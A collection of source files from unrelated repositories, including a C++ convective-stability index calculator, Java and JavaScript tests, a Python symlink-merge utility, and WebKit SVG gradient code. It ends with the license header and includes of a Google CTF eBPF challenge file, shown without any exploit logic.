bind1st(multiplies<double>(), 100.)); // hPa to Pa } auto 
T850Info = STABILITY::Fetch(conf, myTargetInfo, P850Level, TParam); auto TD850Info = STABILITY::Fetch(conf, myTargetInfo, P850Level, TDParam); auto T500Info = STABILITY::Fetch(conf, myTargetInfo, P500Level, TParam); return make_tuple(T500, TD500, P500, T850Info, TD850Info, T500Info); } vec CalculateThetaE(shared_ptr<hitool>& h, double startHeight, double stopHeight) { auto Tstop = h->VerticalValue<double>(TParam, stopHeight); auto RHstop = h->VerticalValue<double>(RHParam, stopHeight); auto Pstop = h->VerticalValue<double>(PParam, stopHeight); auto Tstart = h->VerticalValue<double>(TParam, startHeight); auto RHstart = h->VerticalValue<double>(RHParam, startHeight); auto Pstart = h->VerticalValue<double>(PParam, startHeight); vec ret(Tstop.size()); for (size_t i = 0; i < Tstart.size(); i++) { const double ThetaEstart = metutil::smarttool::ThetaE_<double>(Tstart[i], RHstart[i], Pstart[i] * 100); const double ThetaEstop = metutil::smarttool::ThetaE_<double>(Tstop[i], RHstop[i], Pstop[i] * 100); ret[i] = ThetaEstart - ThetaEstop; } return ret; } void CalculateThetaEIndices(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { vec thetae = CalculateThetaE(h, 2, 3000); myTargetInfo->Find<level>(ThreeKMLevel); myTargetInfo->Find<param>(TPEParam); myTargetInfo->Data().Set(thetae); } void CalculateLiftedIndices(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { auto src = GetLiftedIndicesSourceData(conf, myTargetInfo, h); myTargetInfo->Find<level>(Height0Level); myTargetInfo->Find<param>(LIParam); auto& LI = VEC(myTargetInfo); myTargetInfo->Find<param>(SIParam); auto& SI = VEC(myTargetInfo); const auto& t500m = get<0>(src); const auto& td500m = get<1>(src); const auto& p500m = get<2>(src); const auto& t850 = VEC(get<3>(src)); const auto& td850 = VEC(get<4>(src)); const auto& t500 = VEC(get<5>(src)); vec p500(t500.size(), 50000.); vec p850(t500.size(), 
85000.); for (size_t i = 0; i < t500.size(); i++) { // Lift parcel from lowest 500m average pressure to 500hPa const double t_li = metutil::Lift_<double>(p500m[i], t500m[i], td500m[i], p500[i]); // Lift parcel from 850hPa to 500hPa const double t_si = metutil::Lift_<double>(p850[i], t850[i], td850[i], p500[i]); LI[i] = t500[i] - t_li; SI[i] = t500[i] - t_si; } } vec CalculateCapeShear(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, const vec& EBS) { auto CAPEInfo = STABILITY::Fetch(conf, myTargetInfo, MaxThetaELevel, param("CAPE-JKG")); const auto& CAPE = VEC(CAPEInfo); vec ret(EBS.size()); for (size_t i = 0; i < EBS.size(); i++) { ret[i] = EBS[i] * sqrt(CAPE[i]); } return ret; } void CalculateBulkShearIndices(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h) { myTargetInfo->Find<param>(BSParam); myTargetInfo->Find<level>(OneKMLevel); const auto BS01 = CalculateBulkShear(myTargetInfo, h, 1000); myTargetInfo->Data().Set(BS01); myTargetInfo->Find<level>(ThreeKMLevel); const auto BS03 = CalculateBulkShear(myTargetInfo, h, 3000); myTargetInfo->Data().Set(BS03); myTargetInfo->Find<level>(SixKMLevel); const auto BS06 = CalculateBulkShear(myTargetInfo, h, 6000); myTargetInfo->Data().Set(BS06); // CAPE shear is calculated here too const auto normEBS = CalculateEffectiveBulkShear(conf, myTargetInfo, h, MaxThetaELevel, Height0Level); const auto CAPES = CalculateCapeShear(conf, myTargetInfo, normEBS); myTargetInfo->Find<level>(Height0Level); myTargetInfo->Find<param>(CAPESParam); myTargetInfo->Data().Set(CAPES); // Calculate maximum EBS const auto muMaxEBS = CalculateEffectiveBulkShear(conf, myTargetInfo, h, MaxThetaELevel, MaxWindLevel); myTargetInfo->Find<param>(EBSParam); myTargetInfo->Find<level>(MaxWindLevel); myTargetInfo->Data().Set(muMaxEBS); } void CalculateConvectiveSeverityIndex(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, 
shared_ptr<hitool>& h) { // For CSI we need mixed layer maximum EBS too, which is not needed anywhere else const auto mlEBS = CalculateEffectiveBulkShear(conf, myTargetInfo, h, HalfKMLevel, MaxWindLevel); auto muCAPEInfo = STABILITY::Fetch(conf, myTargetInfo, MaxThetaELevel, param("CAPE-JKG")); auto muLPLInfo = STABILITY::Fetch(conf, myTargetInfo, MaxThetaELevel, param("LPL-M")); auto mlCAPEInfo = STABILITY::Fetch(conf, myTargetInfo, HalfKMLevel, param("CAPE-JKG")); myTargetInfo->Find<param>(EBSParam); myTargetInfo->Find<level>(MaxWindLevel); const auto& muEBS = VEC(myTargetInfo); const auto& muLPL = VEC(muLPLInfo); const auto& muCAPE = VEC(muCAPEInfo); const auto& mlCAPE = VEC(mlCAPEInfo); myTargetInfo->Find<param>(CSIParam); myTargetInfo->Find<level>(Height0Level); auto& CSI = VEC(myTargetInfo); for (size_t i = 0; i < muEBS.size(); i++) { auto cape = MissingDouble(); auto ebs = MissingDouble(); if (muLPL[i] >= 250. && muCAPE[i] > 10.) { cape = muCAPE[i]; ebs = muEBS[i]; } else if (muLPL[i] < 250. && mlCAPE[i] > 10.) { cape = mlCAPE[i]; ebs = mlEBS[i]; } CSI[i] = (ebs * sqrt(2 * cape)) * 0.1; if (ebs <= 15.) 
{ CSI[i] += 0.025 * cape * (-0.06666 * ebs + 1); } } } void stability::Calculate(shared_ptr<info<double>> myTargetInfo, unsigned short theThreadIndex) { auto myThreadedLogger = logger("stabilityThread #" + to_string(theThreadIndex)); const forecast_time forecastTime = myTargetInfo->Time(); const level forecastLevel = myTargetInfo->Level(); const forecast_type forecastType = myTargetInfo->ForecastType(); myThreadedLogger.Info("Calculating time " + static_cast<string>(forecastTime.ValidDateTime()) + " level " + static_cast<string>(forecastLevel)); auto h = GET_PLUGIN(hitool); h->Configuration(itsConfiguration); h->Time(forecastTime); h->ForecastType(forecastType); try { vec FF1500 = h->VerticalValue<double>(FFParam, 1500); myTargetInfo->Find<param>(FFParam); myTargetInfo->Find<level>(EuropeanMileLevel); myTargetInfo->Data().Set(FF1500); } catch (const HPExceptionType& e) { if (e == kFileDataNotFound) { } } try { vec Q500 = h->VerticalAverage<double>(QParam, 0, 500); myTargetInfo->Find<param>(QParam); myTargetInfo->Find<level>(HalfKMLevel); myTargetInfo->Data().Set(Q500); } catch (const HPExceptionType& e) { if (e == kFileDataNotFound) { } } string deviceType = "CPU"; #ifdef HAVE_CUDA if (itsConfiguration->UseCuda()) { deviceType = "GPU"; stabilitygpu::Process(itsConfiguration, myTargetInfo); } else #endif { try { CalculateLiftedIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("Lifted index calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("Lifted index calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateThetaEIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("ThetaE index calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("ThetaE index calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateBulkShearIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("Bulk shear calculation finished"); } catch (const HPExceptionType& e) { 
itsLogger.Warning("Bulk shear calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateHelicityIndices(itsConfiguration, myTargetInfo, h); myThreadedLogger.Info("Storm relative helicity calculation finished"); } catch (const HPExceptionType& e) { itsLogger.Warning("Storm relative helicity calculation failed"); if (e != kFileDataNotFound) { } } try { CalculateConvectiveSeverityIndex(itsConfiguration, myTargetInfo, h); } catch (const HPExceptionType& e) { itsLogger.Warning("Convective stability index calculation failed"); if (e != kFileDataNotFound) { } } } myThreadedLogger.Info("[" + deviceType + "] Missing: " + to_string(util::MissingPercent(*myTargetInfo)) + "%"); } pair<vec, vec> GetSRHSourceData(const shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool> h) { // NOTES COPIED FROM SMARTTOOLS-LIBRARY /* // ********** SRH calculation help from <NAME> ****************** Some tips here on how tyo calculate storm-relative helciity How to calculate storm-relative helicity Integrate the following from p = p_surface to p = p_top (or in case of height coordinates from h_surface to h_top): storm_rel_helicity -= ((u_ID-u[p])*(v[p]-v[p+1]))-((v_ID - v[p])*(u[p]-u[p+1])); Here, u_ID and v_ID are the forecast storm motion vectors calculated with the so-called ID-method. These can be calculated as follows: where /average wind u0_6 = average 0_6 kilometer u-wind component v0_6 = average 0_6 kilometer v-wind component (you should use a pressure-weighted average in case you work with height coordinates) /shear shr_0_6_u = u_6km - u_surface; shr_0_6_v = v_6km - v_surface; / shear unit vector shr_0_6_u_n = shr_0_6_u / ((shr_0_6_u^2 + shr_0_6_v^2)**0.5); shr_0_6_v_n = shr_0_6_v / ((shr_0_6_u^2 + shr_0_6_v^2)** 0.5); /id-vector components u_ID = u0_6 + shr_0_6_v_n * 7.5; v_ID = v0_6 - shr_0_6_u_n * 7.5; (7.5 are meters per second... 
watch out when you work with knots instead) */ // ********** SRH calculation help from <NAME> ****************** // average wind auto Uavg = h->VerticalAverage<double>(UParam, 10, 6000); auto Vavg = h->VerticalAverage<double>(VParam, 10, 6000); // shear auto Ushear = STABILITY::Shear(h, UParam, 10, 6000, Uavg.size()); auto Vshear = STABILITY::Shear(h, VParam, 10, 6000, Uavg.size()); // U & V id vectors vec Uid(Ushear.size(), MissingDouble()); auto Vid = Uid; for (size_t i = 0; i < Ushear.size(); i++) { STABILITY::UVId(Ushear[i], Vshear[i], Uavg[i], Vavg[i], Uid[i], Vid[i]); } return make_pair(Uid, Vid); } void stability::WriteToFile(const shared_ptr<info<double>> targetInfo, write_options writeOptions) { auto aWriter = GET_PLUGIN(writer); aWriter->WriteOptions(writeOptions); // writing might modify iterator positions --> create a copy auto tempInfo = make_shared<info<double>>(*targetInfo); tempInfo->Reset<level>(); while (tempInfo->Next<level>()) { for (tempInfo->Reset<param>(); tempInfo->Next<param>();) { if (!tempInfo->IsValidGrid()) { continue; } aWriter->ToFile(tempInfo, itsConfiguration); } } if (itsConfiguration->UseDynamicMemoryAllocation()) { DeallocateMemory(*targetInfo); } } vec CalculateBulkShear(const vec& U, const vec& V) { vec BS(U.size()); for (size_t i = 0; i < U.size(); i++) { BS[i] = hypot(U[i], V[i]); } return BS; } vec CalculateBulkShear(shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, double stopHeight) { const auto U = STABILITY::Shear(h, UParam, 10, stopHeight, myTargetInfo->SizeLocations()); const auto V = STABILITY::Shear(h, VParam, 10, stopHeight, myTargetInfo->SizeLocations()); return CalculateBulkShear(U, V); } vec CalculateEffectiveBulkShear(shared_ptr<const plugin_configuration>& conf, shared_ptr<info<double>>& myTargetInfo, shared_ptr<hitool>& h, const level& sourceLevel, const level& targetLevel) { const auto Levels = STABILITY::GetEBSLevelData(conf, myTargetInfo, h, sourceLevel, targetLevel); const auto U = 
STABILITY::Shear(h, UParam, Levels.first, Levels.second); const auto V = STABILITY::Shear(h, VParam, Levels.first, Levels.second); return CalculateBulkShear(U, V); }
ypiel-talend/components
services/components-api-service-rest/src/test/java/org/talend/components/service/rest/configuration/ComponentsRegistrySetupTest.java
package org.talend.components.service.rest.configuration; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.arrayWithSize; import org.junit.Test; public class ComponentsRegistrySetupTest { @Test public void testExtractComponentsUrls() { // checking with a null string ComponentsRegistrySetup registrySetup = new ComponentsRegistrySetup(); assertThat(registrySetup.extractComponentsUrls(null), arrayWithSize(0)); // checking with working URLs assertThat(registrySetup.extractComponentsUrls("file://foo,file://bar"), arrayWithSize(2)); // checking with one working URL and one wrong one assertThat(registrySetup.extractComponentsUrls("file://foo,groovybaby://bar"), arrayWithSize(1)); } // TODO need more tests on the createDefinitionRegistry }
likianta/depsland
depsland/utils/mklink.py
import os
from os.path import exists
from pathlib import Path


class T:
    """Type aliases used by this module's helpers."""
    import typing as t
    
    FileExistScheme = t.Literal['error', 'keep', 'overwrite']
    List = t.List
    Optional = t.Optional
    Path = str
    Paths = t.List[Path]


def mklink(src: T.Path, dst: T.Path, force=False) -> T.Path:
    """ Create a symlink at `dst` pointing to `src`; return `dst`.
    
    args:
        force: if True and `dst` already exists, treat it as success and
            return without touching it (the existing entry is NOT replaced);
            if False, an existing `dst` raises FileExistsError.
    
    references:
        common method to create symlink:
            https://csatlas.com/python-create-symlink/
    """
    assert exists(src), f'source path does not exist: {src}'
    if force is True and exists(dst):
        return dst
    if force is False and exists(dst):
        raise FileExistsError(f'destination path already exists: {dst}')
    Path(dst).symlink_to(src)
    return dst


def mklinks(src_dir: T.Path, dst_dir: T.Path,
            names: T.Optional[T.List[str]] = None,
            force=False) -> T.Paths:
    """ Symlink each entry of `src_dir` (or only `names`) into `dst_dir`.
    
    Returns the list of created destination paths.
    """
    out = []
    for n in (names or os.listdir(src_dir)):
        out.append(mklink(f'{src_dir}/{n}', f'{dst_dir}/{n}', force=force))
    return out


def mergelink(src_dir: T.Path, dst_dir: T.Path, new_dir: T.Path,
              file_exist_scheme: T.FileExistScheme = 'error') -> T.Path:
    """ Build `new_dir` as a symlinked merge of `src_dir` over `dst_dir`.
    
    Directories present in both trees are merged recursively; file name
    collisions are resolved per `file_exist_scheme`:
        'error':     raise FileExistsError
        'keep':      link the `dst_dir` version
        'overwrite': link the `src_dir` version
    Entries only present in one tree are linked as-is. Returns `new_dir`.
    """
    src_names = os.listdir(src_dir)
    dst_names = os.listdir(dst_dir)
    
    for sn in src_names:
        sub_src_path = f'{src_dir}/{sn}'
        sub_dst_path = f'{dst_dir}/{sn}'
        sub_new_path = f'{new_dir}/{sn}'
        
        if sn in dst_names:
            if os.path.isdir(sub_src_path):
                # name exists in both trees and is a directory: recurse
                os.mkdir(sub_new_path)
                mergelink(
                    sub_src_path, sub_dst_path, sub_new_path,
                    file_exist_scheme
                )
            else:
                # file collision: resolve per scheme
                if file_exist_scheme == 'error':
                    raise FileExistsError(sub_dst_path)
                elif file_exist_scheme == 'keep':
                    mklink(sub_dst_path, sub_new_path)
                elif file_exist_scheme == 'overwrite':
                    mklink(sub_src_path, sub_new_path)
        else:
            mklink(sub_src_path, sub_new_path)
    
    # link everything that exists only on the dst side
    new_names = os.listdir(new_dir)
    for n in dst_names:
        sub_dst_path = f'{dst_dir}/{n}'
        sub_new_path = f'{new_dir}/{n}'
        assert exists(sub_dst_path), (
            n, n in os.listdir(dst_dir), sub_dst_path
        )
        if n not in new_names:
            mklink(sub_dst_path, sub_new_path)
    
    return new_dir


def mergelinks(src_dir: T.Path, dst_dir: T.Path,
               file_exist_scheme: T.FileExistScheme = 'error') -> T.Paths:
    """ Symlink every entry of `src_dir` into `dst_dir`, merging in place.
    
    Directories present in both trees are rebuilt (via `mergelink`) as a
    merged view; file collisions are resolved per `file_exist_scheme`
    ('error' | 'keep' | 'overwrite'). Returns the touched destination paths.
    """
    out = []
    dst_names = os.listdir(dst_dir)
    
    for n in os.listdir(src_dir):
        src_path = f'{src_dir}/{n}'
        dst_path = f'{dst_dir}/{n}'
        
        if n in dst_names:
            if os.path.isdir(src_path):
                # deferred import: lk_logger is only needed for this log
                # line, so the rest of the module works without it installed
                from lk_logger import lk
                lk.logt('[D2205]', f'merging "{n}" ({src_dir} -> {dst_dir})')
                
                # move the existing dir aside to a free "*_bak" name, then
                # rebuild `dst_path` as a merged view of both trees
                temp = dst_path
                while exists(temp):
                    temp += '_bak'
                os.rename(dst_path, temp)
                
                new_path = dst_path
                dst_path = temp
                if not exists(new_path):
                    os.mkdir(new_path)
                    # os.makedirs(new_path, exist_ok=True)
                mergelink(src_path, dst_path, new_path, file_exist_scheme)
                # NOTE(review): `dst_path` was reassigned to the "*_bak"
                # name above, so that is what gets appended to `out` below
                # (pre-existing behavior, preserved) -- confirm intended.
            else:
                if file_exist_scheme == 'error':
                    raise FileExistsError(dst_path)
                elif file_exist_scheme == 'keep':
                    pass
                elif file_exist_scheme == 'overwrite':
                    # bugfix: this branch previously compared against
                    # 'override', which is not a member of T.FileExistScheme,
                    # so passing 'overwrite' silently behaved like 'keep'.
                    os.remove(dst_path)
                    mklink(src_path, dst_path)
        else:
            mklink(src_path, dst_path, force=False)
        out.append(dst_path)
    
    return out
Yannic/chromium
third_party/blink/web_tests/http/tests/devtools/sources/debugger-ui/async-call-stack-worker.js
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Verifies that the debugger's call-stack sidebar shows an async stack when a
// `debugger` statement fires inside a Worker whose script came from a Blob.
(async function() {
  TestRunner.addResult(`Tests async call stack for workers.\n`);
  await TestRunner.loadModule('sources');
  await TestRunner.loadTestModule('sources_test_runner');
  await TestRunner.showPanel('sources');
  // The page builds a Blob-backed worker that posts 'ready' and breaks on the
  // first message it receives; testFunction() starts it and replies.
  await TestRunner.evaluateInPagePromise(
      `
      var response = ` +
      '`' + `
      postMessage('ready');
      self.onmessage=function(e){
        debugger;
      }
      //# sourceURL=worker.js` +
      '`' + `;
      var blob = new Blob([response], {type: 'application/javascript'});
      function testFunction() {
        var worker = new Worker(URL.createObjectURL(blob));
        worker.onmessage = function(e) {
          worker.postMessage(42);
        };
      }`);

  SourcesTestRunner.startDebuggerTestPromise(/* quiet */ true)
      .then(() => SourcesTestRunner.runTestFunctionAndWaitUntilPausedPromise())
      .then(
          () => TestRunner.addSnifferPromise(
              Sources.CallStackSidebarPane.prototype, 'updatedForTest'))
      .then(() => dumpCallStackSidebarPane())
      .then(() => SourcesTestRunner.completeDebuggerTest());

  // Dumps each visible call-frame item, normalizing volatile VM script ids
  // and blob URLs so the expected output is stable across runs.
  function dumpCallStackSidebarPane() {
    var pane = Sources.CallStackSidebarPane.instance();
    for (var element of pane.contentElement.querySelectorAll(
             '.call-frame-item'))
      TestRunner.addResult(element.deepTextContent()
                               .replace(/VM\d+/g, 'VM')
                               .replace(/blob:http:[^:]+/, 'blob'));
  }
})();
yunseong/incubator-nemo
compiler/optimizer/src/main/java/org/apache/nemo/compiler/optimizer/pass/compiletime/annotating/DefaultMetricPass.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.nemo.compiler.optimizer.pass.compiletime.annotating; import org.apache.nemo.common.DataSkewMetricFactory; import org.apache.nemo.common.HashRange; import org.apache.nemo.common.KeyRange; import org.apache.nemo.common.dag.DAG; import org.apache.nemo.common.ir.edge.IREdge; import org.apache.nemo.common.ir.edge.executionproperty.CommunicationPatternProperty; import org.apache.nemo.common.ir.edge.executionproperty.DataSkewMetricProperty; import org.apache.nemo.common.ir.vertex.IRVertex; import org.apache.nemo.common.ir.vertex.executionproperty.ParallelismProperty; import java.util.HashMap; import java.util.Map; /** * Pass for initiating IREdge Metric ExecutionProperty with default key range. */ @Annotates(DataSkewMetricProperty.class) public final class DefaultMetricPass extends AnnotatingPass { /** * Default constructor. 
*/ public DefaultMetricPass() { super(DefaultMetricPass.class); } @Override public DAG<IRVertex, IREdge> apply(final DAG<IRVertex, IREdge> dag) { dag.topologicalDo(dst -> dag.getIncomingEdgesOf(dst).forEach(edge -> { if (CommunicationPatternProperty.Value.Shuffle .equals(edge.getPropertyValue(CommunicationPatternProperty.class).get())) { final int parallelism = dst.getPropertyValue(ParallelismProperty.class).get(); final Map<Integer, KeyRange> metric = new HashMap<>(); for (int i = 0; i < parallelism; i++) { metric.put(i, HashRange.of(i, i + 1, false)); } edge.setProperty(DataSkewMetricProperty.of(new DataSkewMetricFactory(metric))); } })); return dag; } }
Floating-Island/Java-Exercises-_2018__ES_
Ejercicios/05 - Manejo de colecciones/02/src/bebidas/Bebida.java
package bebidas; public class Bebida { private String marca; public Bebida(String m) { marca = m; } public String queMarca() { return marca; } @Override public String toString() { return "Bebida [marca=" + marca + "]"; } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * result + ((marca == null) ? 0 : marca.hashCode()); return result; } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; Bebida other = (Bebida) obj; if (marca == null) { if (other.marca != null) return false; } else if (!marca.equals(other.marca)) return false; return true; } }
Fragmented-World/fragmented-web-ui
src/styles/PointerLink.js
<reponame>Fragmented-World/fragmented-web-ui
import styled from 'styled-components'

// Anchor styled to always show a pointer cursor, so it still looks
// clickable when used without an href (e.g. with an onClick handler).
const PointerLink = styled.a`
    cursor: pointer;
`

export default PointerLink
jacadcaps/webkitty
Source/WebCore/svg/SVGRadialGradientElement.cpp
/*
 * Copyright (C) 2004, 2005, 2006, 2008 <NAME> <<EMAIL>>
 * Copyright (C) 2004, 2005, 2006, 2007 <NAME> <<EMAIL>>
 * Copyright (C) 2008 <NAME> <<EMAIL>>
 * Copyright (C) 2008 <NAME> <<EMAIL>>
 * Copyright (C) Research In Motion Limited 2010. All rights reserved.
 * Copyright (C) 2018-2019 Apple Inc. All rights reserved.
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Library General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Library General Public License for more details.
 *
 * You should have received a copy of the GNU Library General Public License
 * along with this library; see the file COPYING.LIB.  If not, write to
 * the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
 * Boston, MA 02110-1301, USA.
 */

#include "config.h"
#include "SVGRadialGradientElement.h"

#include "FloatConversion.h"
#include "FloatPoint.h"
#include "RadialGradientAttributes.h"
#include "RenderSVGResourceRadialGradient.h"
#include "SVGNames.h"
#include "SVGStopElement.h"
#include "SVGUnitTypes.h"
#include <wtf/IsoMallocInlines.h>
#include <wtf/NeverDestroyed.h>

namespace WebCore {

WTF_MAKE_ISO_ALLOCATED_IMPL(SVGRadialGradientElement);

inline SVGRadialGradientElement::SVGRadialGradientElement(const QualifiedName& tagName, Document& document)
    : SVGGradientElement(tagName, document)
{
    // Spec: If the cx/cy/r/fr attribute is not specified, the effect is as if a value of "50%" were specified.
    ASSERT(hasTagName(SVGNames::radialGradientTag));

    // Register the animated-length properties exactly once, process-wide.
    static std::once_flag onceFlag;
    std::call_once(onceFlag, [] {
        PropertyRegistry::registerProperty<SVGNames::cxAttr, &SVGRadialGradientElement::m_cx>();
        PropertyRegistry::registerProperty<SVGNames::cyAttr, &SVGRadialGradientElement::m_cy>();
        PropertyRegistry::registerProperty<SVGNames::rAttr, &SVGRadialGradientElement::m_r>();
        PropertyRegistry::registerProperty<SVGNames::fxAttr, &SVGRadialGradientElement::m_fx>();
        PropertyRegistry::registerProperty<SVGNames::fyAttr, &SVGRadialGradientElement::m_fy>();
        PropertyRegistry::registerProperty<SVGNames::frAttr, &SVGRadialGradientElement::m_fr>();
    });
}

Ref<SVGRadialGradientElement> SVGRadialGradientElement::create(const QualifiedName& tagName, Document& document)
{
    return adoptRef(*new SVGRadialGradientElement(tagName, document));
}

// Parses the radial-gradient geometry attributes (cx/cy/r/fx/fy/fr).
// Negative values are forbidden for the radii r and fr.
void SVGRadialGradientElement::parseAttribute(const QualifiedName& name, const AtomString& value)
{
    SVGParsingError parseError = NoError;

    if (name == SVGNames::cxAttr)
        m_cx->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Width, value, parseError));
    else if (name == SVGNames::cyAttr)
        m_cy->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Height, value, parseError));
    else if (name == SVGNames::rAttr)
        m_r->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Other, value, parseError, SVGLengthNegativeValuesMode::Forbid));
    else if (name == SVGNames::fxAttr)
        m_fx->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Width, value, parseError));
    else if (name == SVGNames::fyAttr)
        m_fy->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Height, value, parseError));
    else if (name == SVGNames::frAttr)
        m_fr->setBaseValInternal(SVGLengthValue::construct(SVGLengthMode::Other, value, parseError, SVGLengthNegativeValuesMode::Forbid));

    reportAttributeParsingError(parseError, name, value);

    SVGGradientElement::parseAttribute(name, value);
}

// Any change to a known gradient attribute invalidates instances and
// forces a relayout of the renderer.
void SVGRadialGradientElement::svgAttributeChanged(const QualifiedName& attrName)
{
    if (PropertyRegistry::isKnownAttribute(attrName)) {
        InstanceInvalidationGuard guard(*this);
        updateRelativeLengthsInformation();
        if (RenderObject* object = renderer())
            object->setNeedsLayout();
        return;
    }

    SVGGradientElement::svgAttributeChanged(attrName);
}

RenderPtr<RenderElement> SVGRadialGradientElement::createElementRenderer(RenderStyle&& style, const RenderTreePosition&)
{
    return createRenderer<RenderSVGResourceRadialGradient>(*this, WTFMove(style));
}

// Copies attributes from 'element' into 'attributes', but only those not
// already set by an element earlier in the xlink:href chain (first writer wins).
// The radial-specific attributes are only taken when 'element' is itself radial.
static void setGradientAttributes(SVGGradientElement& element, RadialGradientAttributes& attributes, bool isRadial = true)
{
    if (!attributes.hasSpreadMethod() && element.hasAttribute(SVGNames::spreadMethodAttr))
        attributes.setSpreadMethod(element.spreadMethod());

    if (!attributes.hasGradientUnits() && element.hasAttribute(SVGNames::gradientUnitsAttr))
        attributes.setGradientUnits(element.gradientUnits());

    if (!attributes.hasGradientTransform() && element.hasAttribute(SVGNames::gradientTransformAttr))
        attributes.setGradientTransform(element.gradientTransform().concatenate());

    if (!attributes.hasStops())
        attributes.setStops(element.buildStops());

    if (isRadial) {
        SVGRadialGradientElement& radial = downcast<SVGRadialGradientElement>(element);

        if (!attributes.hasCx() && element.hasAttribute(SVGNames::cxAttr))
            attributes.setCx(radial.cx());

        if (!attributes.hasCy() && element.hasAttribute(SVGNames::cyAttr))
            attributes.setCy(radial.cy());

        if (!attributes.hasR() && element.hasAttribute(SVGNames::rAttr))
            attributes.setR(radial.r());

        if (!attributes.hasFx() && element.hasAttribute(SVGNames::fxAttr))
            attributes.setFx(radial.fx());

        if (!attributes.hasFy() && element.hasAttribute(SVGNames::fyAttr))
            attributes.setFy(radial.fy());

        if (!attributes.hasFr() && element.hasAttribute(SVGNames::frAttr))
            attributes.setFr(radial.fr());
    }
}

// Walks the xlink:href reference chain (with cycle detection) collecting the
// effective gradient attributes. Returns false when this element or any
// referenced gradient has no renderer.
bool SVGRadialGradientElement::collectGradientAttributes(RadialGradientAttributes& attributes)
{
    if (!renderer())
        return false;

    HashSet<SVGGradientElement*> processedGradients;
    SVGGradientElement* current = this;

    setGradientAttributes(*current, attributes);
    processedGradients.add(current);

    while (true) {
        // Respect xlink:href, take attributes from referenced element
        auto target = SVGURIReference::targetElementFromIRIString(current->href(), treeScope());
        if (is<SVGGradientElement>(target.element)) {
            current = downcast<SVGGradientElement>(target.element.get());

            // Cycle detection
            if (processedGradients.contains(current))
                break;

            if (!current->renderer())
                return false;

            setGradientAttributes(*current, attributes, current->hasTagName(SVGNames::radialGradientTag));
            processedGradients.add(current);
        } else
            break;
    }

    // Handle default values for fx/fy: an unspecified focal point coincides
    // with the gradient center.
    if (!attributes.hasFx())
        attributes.setFx(attributes.cx());

    if (!attributes.hasFy())
        attributes.setFy(attributes.cy());

    return true;
}

bool SVGRadialGradientElement::selfHasRelativeLengths() const
{
    return cx().isRelative()
        || cy().isRelative()
        || r().isRelative()
        || fx().isRelative()
        || fy().isRelative()
        || fr().isRelative();
}

}
BearerPipelineTest/google-ctf
2021/quals/pwn-ebpf/healthcheck/exploit.c
<reponame>BearerPipelineTest/google-ctf /* Copyright 2021 Google LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #define _GNU_SOURCE #include <assert.h> #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <stddef.h> #include <unistd.h> #include <fcntl.h> #include <linux/bpf.h> #include <sys/mman.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <sys/syscall.h> #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) #undef NDEBUG // https://www.kernel.org/doc/Documentation/networking/filter.txt // eBPF has one 16-byte instruction: BPF_LD | BPF_DW | BPF_IMM which consists // of two consecutive 'struct bpf_insn' 8-byte blocks and interpreted as single // instruction that loads 64-bit immediate value into a dst_reg. // When src_reg != 0 then it's used to represent operations that load maps or // other special values. 
